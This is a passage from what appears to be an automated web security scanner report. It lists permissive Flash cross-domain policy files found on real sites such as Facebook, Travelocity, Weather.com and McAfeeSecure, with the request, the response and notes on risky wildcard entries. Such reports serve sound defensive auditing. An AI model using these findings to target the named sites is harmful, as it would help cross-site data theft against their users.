<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.75. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

This policy also sets permitted-cross-domain-policies="master-only" in its site-control element, so Flash Player honours only this file and ignores any policy file published under another path on the host; the trusted set is therefore exactly the list below, not something a separate upload could extend.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Sun, 15 May 2011 20:27:09 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.76. http://travel.travelocity.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Two details of this policy deserve a closer look. The entry ad.*.doubleclick.net places the wildcard somewhere other than the leading "*." position, which is the only wildcard form the cross-domain policy file specification defines; treat it as a configuration error rather than a working rule. Most entries also carry secure="false"; that attribute has no effect on a policy fetched over HTTP, but if https://travel.travelocity.com/crossdomain.xml serves the same file it lets a SWF loaded over plain HTTP read the HTTPS host's responses, so the HTTPS copy should be checked as well.

Request

GET /crossdomain.xml HTTP/1.0
Host: travel.travelocity.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:30:05 GMT
Server: Apache
Last-Modified: Thu, 07 Apr 2011 16:03:28 GMT
ETag: "14376-6a3-3ffcb400"
Accept-Ranges: bytes
Content-Length: 1699
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
    SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.travelocity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.travelocity.com"    secure="false" />
...[SNIP]...
<allow-access-from domain="i.travelocity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.travelpn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="i.travelpn.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="i.travelocity.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="travelocityf.download.akamai.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="ag.travelocity.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="hg.travelocity.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="design.int.travelocity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="ad.*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dotomi.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sabre.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ach.travel.yahoo.net" secure="false" />
...[SNIP]...
<allow-access-from domain="travelrewardspn.capitalone.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.travelocity.com" secure="true" />
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net" secure="true" />
...[SNIP]...
<allow-access-from domain="fr.travelocity.ca" secure="false" />
...[SNIP]...

6.77. http://travel.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://travel.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: travel.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 15:11:34 GMT
Accept-Ranges: bytes
ETag: "226a727a2bccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:34 GMT
Connection: close
Content-Length: 1507

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...

6.78. http://webassets.scea.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webassets.scea.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: webassets.scea.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Date: Sun, 15 May 2011 20:27:01 GMT
Content-Length: 4479
Content-Type: text/xml
ETag: "1ce49f2-117f-49aeb16104640"
Expires: Sun, 15 May 2011 15:50:32 GMT
Last-Modified: Fri, 28 Jan 2011 17:06:25 GMT
Accept-Ranges: bytes
Server: Level-3 Origin Storage/1.5
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secureus.playstation.com"/>

<allow-access-from domain="fp.scea.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp-stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="repl.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp-repl.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.local.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="local.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa-fp-repl.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa-fp-stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="repl.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.stage.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="sp-int.beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.sp-int.beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.www.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="sp-int.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.sp-int.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta33.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta43.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta45.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta33.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta43.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta45.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.littlebigworkshop.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.littlebigworkshop.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.www.littlebigworkshop.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stagea.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="proda.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodb.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.191.161" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.191.162" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.191.175" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.159.215" secure="false"/>
...[SNIP]...
<allow-access-from domain="173.203.129.45" secure="false"/>
...[SNIP]...
<allow-access-from domain="playstation.stage.lithium.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="boardsus-stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="boardsus.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="gap.opencirclecorp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="rls.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ogs.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="np.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage-webassets.scea.com" secure="false"/>
...[SNIP]...

6.79. http://wow.weather.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wow.weather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

The wildcard entries here are not all equivalent. *.weather.com and *.imwx.com cover hosts the site operator controls, but *.amazonaws.com matches hostnames that any AWS customer can obtain, so that single entry extends two-way access to the public rather than to one partner. The entry *2mdn.net also uses a wildcard outside the leading "*." form that the policy file specification defines.

Request

GET /crossdomain.xml HTTP/1.0
Host: wow.weather.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:52 GMT
Server: Apache
SVRNAME: web2x01
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2057
Keep-Alive: timeout=1, max=7463
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.weather.com" />
<allow-access-from domain="*.epicmashup.com" />
<allow-access-from domain="showcase.weather.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.imwx.com" />
<allow-access-from domain="*.rga.com" />
<allow-access-from domain="*.jnj.com" />

<allow-access-from domain="*.zyrtec.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.gigyahosting.com" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="adportal.pointroll.com" />
<allow-access-from domain="*.ge.com" />
<allow-access-from domain="*.inbcu.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="devworks.ivillage.com" />
<allow-access-from domain="devi.ivillage.com" />
<allow-access-from domain="i.ivillage.com" />
<allow-access-from domain="www.ivillage.com" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.tvpdigital.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="apps.eyewonderlabs.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="fjpecvaa.joyent.us" />
<allow-access-from domain="widget.bravotv.com" />
<allow-access-from domain="*.jwtdev.com" />
<allow-access-from domain="*.jwtweb.com" />
<allow-access-from domain="*.na.jnj.com" />
<allow-access-from domain="*2mdn.net" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...

6.80. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.99.38
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.81. http://www.fingerhut.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fingerhut.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fingerhut.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 21 Sep 2010 21:58:02 GMT
Accept-Ranges: bytes
Content-Length: 430
Content-Type: text/xml
X-N: S
Date: Mon, 16 May 2011 01:32:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="convertlanguage.com"/>
   <allow-access-from domain="*.convertlanguage.com"/>
   <allow-access-from domain="fingerhut.com"/>
   <allow-access-from domain="*.fingerhut.com"/>
...[SNIP]...

6.82. https://www.fingerhut.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fingerhut.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fingerhut.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 21 Sep 2010 21:58:02 GMT
Accept-Ranges: bytes
Content-Length: 430
Content-Type: text/xml
X-N: S
Date: Mon, 16 May 2011 01:37:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="convertlanguage.com"/>
   <allow-access-from domain="*.convertlanguage.com"/>
   <allow-access-from domain="fingerhut.com"/>
   <allow-access-from domain="*.fingerhut.com"/>
...[SNIP]...

6.83. http://www.mcafeesecure.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mcafeesecure.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mcafeesecure.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
Cache-Control: private
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 01:38:53 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.84. https://www.mcafeesecure.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.mcafeesecure.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mcafeesecure.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
Cache-Control: private
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 01:37:35 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.85. http://www.telegraph.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.telegraph.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.telegraph.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
